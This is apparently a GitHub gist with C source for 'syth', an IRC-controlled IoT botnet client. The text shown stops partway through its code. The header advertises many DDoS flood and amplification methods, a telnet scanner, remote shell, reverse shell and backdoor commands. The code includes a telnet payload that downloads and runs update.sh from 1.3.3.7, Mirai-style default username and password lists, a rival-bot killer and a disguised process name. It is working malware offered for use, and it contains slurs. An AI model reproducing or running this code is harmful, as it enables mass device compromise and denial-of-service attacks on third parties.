Skip to content

Instantly share code, notes, and snippets.

@augustgl

augustgl/syth.c

Created November 28, 2018 02:14
Show Gist options
  • Save augustgl/4045f22150bc46398c9eb6ac07e16db1 to your computer and use it in GitHub Desktop.
Save augustgl/4045f22150bc46398c9eb6ac07e16db1 to your computer and use it in GitHub Desktop.
Download ZIP
syth, botnet project I worked on wit some friends
Raw
syth.c
/*******************************************************************************
* This is a IRC based distributed denial of service client. It connects to *
* the server specified below and accepts commands via the channel specified. *
* The syntax is: *
* !<nick> <command> *
* You send this message to the channel that is defined later in this code. *
* Where <nick> is the nickname of the client (which can include wildcards) *
* and the command is the command that should be sent. For example, if you *
* want to tell all the clients with the nickname starting with N, to send you *
* the help message, you type in the channel: *
* *
* This variant is special. *
* It 17 DDoS methods in total!!! which include four amplification methods *
* DNS, NTP, Quake3, and SNMP *
* It has a spoofed UDP flooder, 2 non-spoofed UDP flooders, a mulithreaded *
* spoofed TCP flooder (allows flags/attack method), vanilla TCP connection *
* flood, and non spoofed vanilla TCP random data flood. *
* Packets are made up of random bytes, between 0x00 - 0xFF. And random packet *
* size between 32 - 8192. It is extemely hard to block. *
* it also has sockstress, targa3 and blacknurse! *
* it also has 5 non root/non spoof attack methods in which ALL bots can run! *
* it has phatwonk, which I coded in about 15 minutes, based off of PAN. You *
* can set any flag, such as syn, fin, psh, rst, xmas, usyn. Anything. *
* I have added the qbot rebirthv4 telnet scanner *
* it now uses 74 default IoT device username and password combinations *
* it also uses the Mirai IP range generator to increase scanning speed. *
* the scanner starts a new fork() for each CPU core. *
* And increases sockets according to how many CPUs exist. *
* it also reports all cracked telnet logins, successful payload sends. *
* and successful infections to the main channel. *
* it uses a simple echo command at the end of the command to determine wether *
* the device has been infected successfully or not. *
* *
* Successes: *
* [TELNET] [+] LOGIN CRACKED ---> username:password:1.2.3.4 *
* [TELNET] [+] PAYLOAD SENT ---> username:password:1.2.3.4 *
* [TELNET] [+] SUCCESSFUL INFECTION ---> username:password:1.2.3.4 *
* *
* fail to send payload: (socket error) *
* [TELNET] [-] FAILED TO SEND PAYLOAD ---> username:password:1.2.3.4 *
* *
* failed to infect: (payload sent, 60000ms passed and no echo received) *
* [TELNET] [-] FAILED TO INFECT ---> username:password:1.2.3.4 *
* *
* The scanner is started once connected to the server. *
* This way your bots only scan when they are connected, so *
* if your server is down, they wont scan. And it will appear as if your net *
* got killed but they will still attempt to connect to your server(s) *
* and start the scanner again if they are able to connect *
* *
* I have also added an advanced process name based botkiller. *
* The botkiller tries to find the bot, then kills it also, not to mention if *
* it exists on the HDD the bot that was killed gets deleted. *
* NO shell commands are required for the botkiller! *
* Also the botnet can detect 15 different architectures :) *
* All bot nicknames are PREFIX|ARCH|RANDID. Examples: *
* BOT|MIPS|Jg6dug or BOT|x86_64|kA79aLOi, etc. *
* Bot IDs are rand 4 - 8 alphanumeric charactars. *
* where PREFIX is what you specify, ARCH is the architecture. *
* RANDID is the bot suffix / ID. *
* !N* HELP *
* That will send you a list of all the commands. You can also specify an *
* astrick alone to make all client do a specific command: *
* !* SH uname -a *
* There are a large number of commands that can be sent to the client: *
* *
* Non-spoof / non-root commands: *
* STD <ip> <port> <time> = A non spoof UDP HIV STD flooder *
* HOLD <host> <port> <time> = A vanilla TCP connection flooder *
* JUNK <host> <port> <time> = A vanilla TCP flooder (modded) *
* UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non-spoof udp flooder
* HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder added by Bit-Dealer
* WGETFLOOD <url> <secs> = An HTTP(S) flooder *
* *
* Spoof / root attacks: *
* PAN <target> <port> <secs> = A SYN flooder *
* TCP <target> <port> <time> <flags/method> <packetsize> <pollinterval> <threads> = An advanced spoofed TCP flooder. Multithreading and xmas, usyn methods added by Bit-Dealer/Bit-Dealer.
* UDP <target> <port> <secs> = An UDP flooder *
* PHATWONK <target> <flags/method> <secs> = A leet flooder coded by Bit-Dealer, attacks 31 ports. Can set flags or attack method.
* Server kill attacks:
* SOCKSTRESS <ip>:<port> <interface> -s <time> [-p payload] [-d delay] = Sockstress. TCP/IP stack 'exploit'. Has been known to brick servers. added by Bit-Dealer
* BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop packets.
* TARGA3 <ip1> [ip2] ... [-s seconds] = Targa3 attack added by Bit-Dealer. TCP stack fuzzer. Can attack up to 200 hosts at once. Will bypass most filters and crash old machines.
* Amplification attacks:
* NTP <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time> = A DrDoS flooder using the NTP protocol
* DNS <IP> <port> <reflection file url> <threads> <time> = DNS DrDoS flooder
* QUAKE3 <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time> = A DrDoS flooder using the Quake3 protocol
* SNMP <IP> <port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time> = SNMP DrDoS flooder. Extremely fucking insane amp factor!!! (600 - 1700x)
* *
* Other commands: *
* SCANNER <ON/OFF> = Toggles scanner. Started automatically. *
* PROXYFLUX = Fast-flux Proxy. Disabled. for now ;) *
* GETIP = Get current bot IP *
* DNS2IP <domain> = Get IP address from domain *
* IP2DNS <ip> <open port> = Get domain from IP address *
* NICK <nick> = Changes the nick of the client *
* SERVER <server> = Changes servers *
* GETSPOOFS = Gets the current spoofing *
* SPOOFS <subnet> = Changes spoofing to a subnet *
* DISABLE = Disables all packeting from this bot *
* ENABLE = Enables all packeting from this bot *
* KILL = Kills the knight *
* GET <http address> <save as> = Downloads a file off the web *
* VERSION = Requests version of knight *
* KILLALL = Kills all current packeting *
* HELP = Displays this *
* IRC <command> = Sends this command to the server *
* SH <command> = Executes a command *
* BASH <command> = Run a bash command *
* ISH <command> = Interactive SH (via privmsg) *
* SHD <command> = Daemonize command *
* UPDATE <http://server/bot> = Update this bot *
* HACKPKG <http://server/bin> = Install binary (no dependencies) *
* INSTALL <http://server/bin> = Install binary (via wget) *
* BINUPDATE <http://server/bin> = Update a binary (via wget) *
* SCAN <nmap opts> = Call an nmap wrapper script *
* GETSSH <http:serverdropbear> = Install dropbear, run on port 30022 *
* RSHELL <ip port> = Equates to nohup nc ip port *
* GETBB <tftp server> = Get a proper busybox (via tftp) *
* LOCKUP <http://server/bin> = Kill telnet, install a backdoor! *
* *
* Remember, all these commands must be prefixed by ! and the bot suffix that *
* you want the command to be sent to (can include wildcards). *
* spaces in between the ! and the nickname, and there are no spaces before *
* the ! *
*******************************************************************************/
////////////////////////////////////////////////////////////////////////////////
// EDIT THESE //
////////////////////////////////////////////////////////////////////////////////
#undef STARTUP // Start on startup?
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "-bash" // What you want this to hide as
#define CHAN "#spartanarmy" // Channel to join
#define KEY "d!ne!nhell" // The key of the channel
#define PREFIX "KEK" // The NICK prefix
#define SERVER_ADDR "" // Fast-flux server address FF is disabled for now.
#define SERVER_PORT "" // Your IRC server(s) port
#define PROXY_PORT "" // Proxy port for fast-flux
int numservers=1; // Must change this to equal number of servers down there
char *servers[] = { // List the servers in that format, always end in (void*)0
"put.your.server.here",
(void*)0
};
//Telnet payload must end with \r\n\0
char *Telnet_Payload = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || busybox cd /tmp || busybox cd /var/run || busybox cd /mnt || busybox cd /root || busybox cd / || /bin/busybox cd /tmp || /bin/busybox cd /var/run || /bin/busybox cd /mnt || /bin/busybox cd /root || /bin/busybox cd /; wget http://1.3.3.7/update.sh; busybox wget http://1.3.3.7/update.sh; /bin/busybox wget http://1.3.3.7/update.sh; /usr/busybox wget http://1.3.3.7/update.sh; ftpget -v -u anonymous -p anonymous -P 21 1 3.3.7 update.sh update.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 1 3.3.7 update.sh update.sh; /bin/busybox ftpget -v -u anonymous -p anonymous -P 21 1 3.3.7 update.sh update.sh; /usr/busybox ftpget -v -u anonymous -p anonymous -P 21 1 3.3.7 update.sh update.sh; chmod 777 update.sh; busybox chmod 777 update.sh; /bin/busybox chmod 777 update.sh; /usr/busybox chmod 777 update.sh; ./update.sh; rm -rf update.sh; busybox rm -rf update.sh; /bin/busybox rm -rf update.sh; /usr/busybox rm -rf update.sh; echo PRAISEKEK; busybox echo NULLZSEC ROCKS; /bin/busybox echo NULLZSEC ROCKS; /usr/busybox echo NULLZSEC ROCKS\r\n\0";
////////////////////////////////////////////////////////////////////////////////
// STOP HERE! //
////////////////////////////////////////////////////////////////////////////////
#include <stdarg.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <strings.h>
#include <unistd.h>
#include <dirent.h>
#include <poll.h>
#include <netdb.h>
#include <time.h>
#include <pthread.h>
#include <net/if.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
//amp settings
#define MAX_PACKET_SIZE 8192
#define PHI 0x9e3779b9
//DNS amp
#define PACKETS_PER_RESOLVER 25
//telnet scanner stuff
#define CMD_IAC 255
#define CMD_WILL 251
#define CMD_WONT 252
#define CMD_DO 253
#define CMD_DONT 254
#define PAD_RIGHT 1
#define PAD_ZERO 2
#define PRINT_BUF_LEN 12
#define OPT_SGA 3
#define SOCKBUF_SIZE 1024
//lil tool
#define NUMITEMS(x) (sizeof(x) / sizeof((x)[0]))
//Sockstress settings
#define DEBUG_MODE 0 // Set to 1 to enable extremely verbose output
#define DEFAULT_SYN_DELAY (10 * 1000) // 10ms
#define IP_PROT_TCP 6
#define MAX_PAYLOAD_SIZE 1000
#pragma pack(push)
#pragma pack(1)
char *Bot_Killer_Binarys[] = {
"mips",
"mips64",
"mipsel",
"sh2eb",
"sh2elf",
"sh4",
"x86",
"arm",
"armv5",
"armv4tl",
"armv4",
"armv6",
"i686",
"powerpc",
"powerpc440fp",
"i586",
"m68k",
"sparc",
"x86_64",
"jackmymips",
"jackmymips64",
"jackmymipsel",
"jackmysh2eb",
"jackmysh2elf",
"jackmysh4",
"jackmyx86",
"jackmyarmv5",
"jackmyarmv4tl",
"jackmyarmv4",
"jackmyarmv6",
"jackmyi686",
"jackmypowerpc",
"jackmypowerpc440fp",
"jackmyi586",
"jackmym68k",
"jackmysparc",
"jackmyx86_64",
"hackmymips",
"hackmymips64",
"hackmymipsel",
"hackmysh2eb",
"hackmysh2elf",
"hackmysh4",
"hackmyx86",
"hackmyarmv5",
"hackmyarmv4tl",
"hackmyarmv4",
"hackmyarmv6",
"hackmyi686",
"hackmypowerpc",
"hackmypowerpc440fp",
"hackmyi586",
"hackmym68k",
"hackmysparc",
"hackmyx86_64",
"b1",
"b2",
"b3",
"b4",
"b5",
"b6",
"b7",
"b8",
"b9",
"b10",
"b11",
"b12",
"b13",
"b14",
"b15",
"b16",
"b17",
"b18",
"b19",
"b20",
"busyboxterrorist",
"dvrHelper",
"kmymips",
"kmymips64",
"kmymipsel",
"kmysh2eb",
"kmysh2elf",
"kmysh4",
"kmyx86",
"kmyarmv5",
"kmyarmv4tl",
"kmyarmv4",
"kmyarmv6",
"kmyi686",
"kmypowerpc",
"kmypowerpc440fp",
"kmyi586",
"kmym68k",
"kmysparc",
"kmyx86_64",
"lolmips",
"lolmips64",
"lolmipsel",
"lolsh2eb",
"lolsh2elf",
"lolsh4",
"lolx86",
"lolarmv5",
"lolarmv4tl",
"lolarmv4",
"lolarmv6",
"loli686",
"lolpowerpc",
"lolpowerpc440fp",
"loli586",
"lolm68k",
"lolsparc",
"telmips",
"telmips64",
"telmipsel",
"telsh2eb",
"telsh2elf",
"telsh4",
"telx86",
"telarmv5",
"telarmv4tl",
"telarmv4",
"telarmv6",
"teli686",
"telpowerpc",
"telpowerpc440fp",
"teli586",
"telm68k",
"telsparc",
"telx86_64",
"TwoFacemips",
"TwoFacemips64",
"TwoFacemipsel",
"TwoFacesh2eb",
"TwoFacesh2elf",
"TwoFacesh4",
"TwoFacex86",
"TwoFacearmv5",
"TwoFacearmv4tl",
"TwoFacearmv4",
"TwoFacearmv6",
"TwoFacei686",
"TwoFacepowerpc",
"TwoFacepowerpc440fp",
"TwoFacei586",
"TwoFacem68k",
"TwoFacesparc",
"TwoFacex86_64",
"x86_64",
"xxb1",
"xxb2",
"xxb3",
"xxb4",
"xxb5",
"xxb6",
"xxb7",
"xxb8",
"xxb9",
"xxb10",
"xxb11",
"xxb12",
"xxb13",
"xxb14",
"xxb15",
"xxb16",
"xxb17",
"xxb18",
"xxb19",
"xxb20",
"bb",
"busybotnet",
"busybox",
"B1",
"B2",
"B3",
"B4",
"B5",
"B6",
"B7",
"B8",
"B9",
"B10",
"B11",
"B12",
"B13",
"B14",
"B15",
"B16",
"B17",
"B18",
"B20",
"gaybot"
};
int botskilled = 0;
int botsniggered = 0;
const char *UserAgents[] = {
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
"Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",
"Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
"Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",
"Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
"Mozilla/5.0 (PLAYSTATION 3; 3.55)",
"Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",
"wii libnup/1.0",
"Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
"PSP (PlayStation Portable); 2.00",
"Bunjalloo/0.7.6(Nintendo DS;U;en)",
"Doris/1.15 [en] (Symbian)",
"BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100",
"Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
"Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01",
"Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
"Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0",
"SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0",
"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)",
"MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0",
"Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0",
"Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000",
"MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1"
};
char *Telnet_Usernames[] = {
"telnet\0", //telnet:telnet
"root\0", //root:root
"admin\0", //admin:toor
"user\0", //user:admin
"login\0", //login:user
"guest\0", //guest:guest
"support\0" //support:login
"root\0", //root:netgear1
"root\0", //root:maxided
"CISCO\0", //CISCO:CISCO
"oracle\0", //oracle:oracle
"tim\0", //tim:tim
// Mirai combos begin
"root\0", //root:xc3511
"root\0", //root:vizxv
"root\0", //root:admin
"admin\0", //admin:admin
"root\0", //root:888888
"root\0", //root:xmhdipc
"root\0", //root:default
"root\0", //root:juantech
"root\0", //root:123456
"root\0", //root:54321
"support\0", //support:support
"root\0", //root:(none)
"admin\0", //admin:password
"root\0", //root:root
"root\0", //root:12345
"user\0", //user:user
"admin\0", //admin:(none)
"root\0", //root:pass
"admin\0", //admin:admin1234
"root\0", //root:1111
"admin\0", //admin:smcadmin
"admin\0", //admin:1111
"root\0", //root:666666
"root\0", //root:password
"root\0", //root:1234
"root\0", //root:klv123
"Administrator\0", //Administrator:admin
"service\0", //service:service
"supervisor\0", //supervisor:supervisor
"guest\0", //guest:guest
"guest\0", //guest:12345
"guest\0", //guest:12345
"admin1\0", //admin1:password
"administrator\0", //administrator:1234
"666666\0", //666666:666666
"888888\0", //888888:888888
"ubnt\0", //ubnt:ubnt
"klv1234\0", //root:klv1234
"Zte521\0", //root:Zte521
"hi3518\0", //root:hi3518
"jvbzd\0", //root:jvbzd
"anko\0", //root:anko
"zlxx\0", //root:zlxx
"7ujMko0vizxv\0", //root:7ujMko0vizxv
"7ujMko0admin\0", //root:7ujMko0admin
"system\0", //root:system
"ikwb\0", //root:ikwb
"dreambox\0", //root:dreambox
"user\0", //root:user
"realtek\0", //root:realtek
"00000000\0", //root:00000000
"1111111\0", //admin:1111111
"1234\0", //admin:1234
"12345\0", //admin:12345
"54321\0", //admin:54321
"123456\0", //admin:123456
"7ujMko0admin\0", //admin:7ujMko0admin
"1234\0", //admin:1234
"pass\0", //admin:pass
"meinsm\0", //admin:meinsm
"tech\0", //tech:tech
"fucker\0", //mother:fucker
};
char *Telnet_Passwords[] = {
"telnet\0", //telnet:telnet
"root\0", //root:root
"toor\0", //admin:toor
"admin\0", //user:admin
"user\0", //login:user
"guest\0", //guest:guest
"login\0", //support:login
"changeme\0", //(none):changeme
"1234\0", //(none):1234
"12345\0", //(none):12345
"123456\0", //(none):123456
"default\0", //(none):default
"pass\0", //(none):pass
"password\0", //(none):password
"support\0", //(none):support
"\0" //(none):(none)
"maxided\0" //root:maxided
"oracle\0", //oracle:oracle
"tim\0", //tim:tim
// Mirai combos begin
"xc3511\0", //root:xc3511
"vizxv\0", //root:vizxv
"admin\0", //root:admin
"admin\0", //admin:admin
"888888\0", //root:888888
"xmhdipc\0", //root:xmhdipc
"default\0", //root:default
"juantech\0", //root:juantech
"123456\0", //root:123456
"54321\0", //root:54321
"support\0", //support:support
"\0", //root:(none)
"password\0", //admin:password
"root\0", //root:root
"12345\0", //root:12345
"user\0", //user:user
"\0", //admin:(none)
"pass\0", //root:pass
"admin1234\0", //admin:admin1234
"1111\0", //root:1111
"smcadmin\0", //admin:smcadmin
"1111\0", //admin:1111
"666666\0", //root:666666
"password\0", //root:password
"1234\0", //root:1234
"klv123\0", //root:klv123
"admin\0", //Administrator:admin
"service\0", //service:service
"supervisor\0", //supervisor:supervisor
"guest\0", //guest:guest
"12345\0", //guest:12345
"12345\0", //guest:12345
"password\0", //admin1:password
"1234\0", //administrator:1234
"666666\0", //666666:666666
"888888\0", //888888:888888
"ubnt\0", //ubnt:ubnt
"klv1234\0", //root:klv1234
"Zte521\0", //root:Zte521
"hi3518\0", //root:hi3518
"jvbzd\0", //root:jvbzd
"anko\0", //root:anko
"zlxx\0", //root:zlxx
"7ujMko0vizxv\0", //root:7ujMko0vizxv
"7ujMko0admin\0", //root:7ujMko0admin
"system\0", //root:system
"ikwb\0", //root:ikwb
"dreambox\0", //root:dreambox
"user\0", //root:user
"realtek\0", //root:realtek
"00000000\0", //root:00000000
"1111111\0", //admin:1111111
"1234\0", //admin:1234
"12345\0", //admin:12345
"54321\0", //admin:54321
"123456\0", //admin:123456
"7ujMko0admin\0", //admin:7ujMko0admin
"1234\0", //admin:1234
"pass\0", //admin:pass
"meinsm\0", //admin:meinsm
"tech\0", //tech:tech
"fucker\0", //mother:fucker
};
char* advances[] = {":", "user", "ogin", "name", "pass", "dvrdvs", (char*)0};
char* fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};
char* successes[] = {"busybox", "$", "#", "shell", "dvrdvs", (char*)0};
char* advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};
struct telstate_t {
int fd;
unsigned int ip;
unsigned char state;
unsigned char complete;
unsigned char usernameInd; /* username */
unsigned char passwordInd; /* password */
unsigned char tempDirInd; /* tempdir */
unsigned int tTimeout; /* totalTimeout */
unsigned short bufUsed;
char *sockbuf;
};
int scanPid = 0;
int sock,changeservers=0;
int *pids, actualparent;
char *server, *chan, *key, *nick, *ident, *user, disabled=0, execfile[256], dispass[256];
//unsigned int *pids;
unsigned long spoofs=0, spoofsm=0, numpids=0;
char *getBuild() {
#if defined(__x86_64__) || defined(_M_X64)
return "x86_64";
#elif defined(i386) || defined(__i386__) || defined(__i386) || defined(_M_IX86)
return "x86_32";
#elif defined(__ARM_ARCH_2__)
return "ARM2";
#elif defined(__ARM_ARCH_3__) || defined(__ARM_ARCH_3M__)
return "ARM3";
#elif defined(__ARM_ARCH_4T__) || defined(__TARGET_ARM_4T)
return "ARM4T";
#elif defined(__ARM_ARCH_5_) || defined(__ARM_ARCH_5E_)
return "ARM5"
#elif defined(__ARM_ARCH_6T2_) || defined(__ARM_ARCH_6T2_)
return "ARM6T2";
#elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6J__) || defined(__ARM_ARCH_6K__) || defined(__ARM_ARCH_6Z__) || defined(__ARM_ARCH_6ZK__)
return "ARM6";
#elif defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) || defined(__ARM_ARCH_7R__) || defined(__ARM_ARCH_7M__) || defined(__ARM_ARCH_7S__)
return "ARM7";
#elif defined(__aarch64__)
return "ARM64";
#elif defined(mips) || defined(__mips__) || defined(__mips)
return "MIPS";
#elif defined(__sh__)
return "SUPERH";
#elif defined(__powerpc) || defined(__powerpc__) || defined(__powerpc64__) || defined(__POWERPC__) || defined(__ppc__) || defined(__ppc64__) || defined(__PPC__) || defined(__PPC64__) || defined(_ARCH_PPC) || defined(_ARCH_PPC64)
return "POWERPC";
#elif defined(__sparc__) || defined(__sparc)
return "SPARC";
#elif defined(__m68k__)
return "M68K";
#else
return "UNKNOWN";
#endif
}
u_char rseed[4096];
int rsi, rnd, pid;
#if __BYTE_ORDER == __LITTLE_ENDIAN
#ifndef htons
unsigned short int htons (unsigned short int hostshort);
#endif
#define TONS(n) htons(n)
#elif __BYTE_ORDER == __BIG_ENDIAN
#define TONS(n) (n)
#endif
// Calculates the checksum of the ip header.
unsigned short csum(unsigned short *ptr,int nbytes)
{
register long sum;
unsigned short oddbyte;
register short answer;
sum=0;
while(nbytes>1) {
sum+=*ptr++;
nbytes-=2;
}
if(nbytes==1) {
oddbyte=0;
*((u_char*)&oddbyte)=*(u_char*)ptr;
sum+=oddbyte;
}
sum = (sum>>16)+(sum & 0xffff);
sum = sum + (sum>>16);
answer=(short)~sum;
return(answer);
}
int strwildmatch(const char* pattern, const char* string) {
switch(*pattern) {
case '\0': return *string;
case '*': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
case '?': return !(*string && !strwildmatch(pattern+1, string+1));
default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1));
}
}
int Send(int sock, char *words, ...) {
static char textBuffer[1024];
va_list args;
va_start(args, words);
vsprintf(textBuffer, words, args);
va_end(args);
return write(sock,textBuffer,strlen(textBuffer));
}
int mfork(char *sender) {
unsigned int parent, *newpids, i;
if (disabled == 1) {
Send(sock, "NOTICE %s :Unable to comply.\n", sender);
return 1;
}
parent=fork();
if (parent <= 0) return parent;
numpids++;
newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
for (i=0;i<numpids-1;i++) newpids[i]=pids[i];
newpids[numpids-1]=parent;
free(pids);
pids=newpids;
return parent;
}
unsigned long getspoof() {
if (!spoofs) return rand();
if (spoofsm == 1) return ntohl(spoofs);
return ntohl(spoofs+(rand() % spoofsm)+1);
}
void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n') a[strlen(a)-1]=0; }
char *randstring(int length) {
srand(time(NULL));
char *charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
size_t stringLen = 26*2+10;
char *randomString;
randomString = malloc(sizeof(char) * (length +1));
if (!randomString) {
return (char*)0;
}
unsigned int key = 0;
int n;
for (n = 0;n < length;n++) {
key = rand() % stringLen;
randomString[n] = charset[key];
}
randomString[length] = '\0';
return randomString;
}
void identd() {
int sockname,sockfd,sin_size,tmpsock,i;
struct sockaddr_in my_addr,their_addr;
char szBuffer[1024];
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return;
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(113);
my_addr.sin_addr.s_addr = INADDR_ANY;
memset(&(my_addr.sin_zero), 0, 8);
if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return;
if (listen(sockfd, 1) == -1) return;
if (fork() == 0) return;
sin_size = sizeof(struct sockaddr_in);
if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) exit(0);
for(;;) {
fd_set bla;
struct timeval timee;
FD_ZERO(&bla);
FD_SET(tmpsock,&bla);
timee.tv_sec=timee.tv_usec=60;
if (select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0);
if (FD_ISSET(tmpsock,&bla)) break;
}
i = recv(tmpsock,szBuffer,1024,0);
if (i <= 0 || i >= 20) exit(0);
szBuffer[i]=0;
if (szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0;
if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0;
Send(tmpsock, "%s : USERID : UNIX : %s\n",szBuffer,ident);
close(tmpsock);
close(sockfd);
exit(0);
}
long pow(long a, long b) {
if (b == 0) return 1;
if (b == 1) return a;
return a*pow(a,b-1);
}
u_short in_cksum(u_short *addr, int len) {
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer =0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
void get(int sock, char *sender, int argc, char **argv) {
int sock2,i,d;
struct sockaddr_in server;
unsigned long ipaddr;
char buf[1024];
FILE *file;
unsigned char bufm[4096];
if (mfork(sender) != 0) return;
if (argc < 2) {
Send(sock, "NOTICE %s :GET <host> <save as>\n", sender);
exit(0);
}
if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
Send(sock, "NOTICE %s :Unable to create socket.\n", sender);
exit(0);
}
if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);
else strcpy(buf,argv[1]);
for (i=0;i<strlen(buf) && buf[i] != '/';i++);
buf[i]=0;
server.sin_family = AF_INET;
server.sin_port = htons(80);
if ((ipaddr = inet_addr(buf)) == -1) {
struct hostent *hostm;
if ((hostm=gethostbyname(buf)) == NULL) {
Send(sock, "NOTICE %s :Unable to resolve address.\n", sender);
exit(0);
}
memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
}
else server.sin_addr.s_addr = ipaddr;
memset(&(server.sin_zero), 0, 8);
if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
Send(sock, "NOTICE %s :Unable to connect to http.\n", sender);
exit(0);
}
Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);
Send(sock, "NOTICE %s :Receiving file.\n", sender);
file=fopen(argv[2],"wb");
while(1) {
int i;
if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
if (i < 4096) bufm[i]=0;
for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
for (d+=4;d<i;d++) fputc(bufm[d],file);
goto done;
}
}
done:
Send(sock, "NOTICE %s :Saved as %s\n", sender,argv[2]);
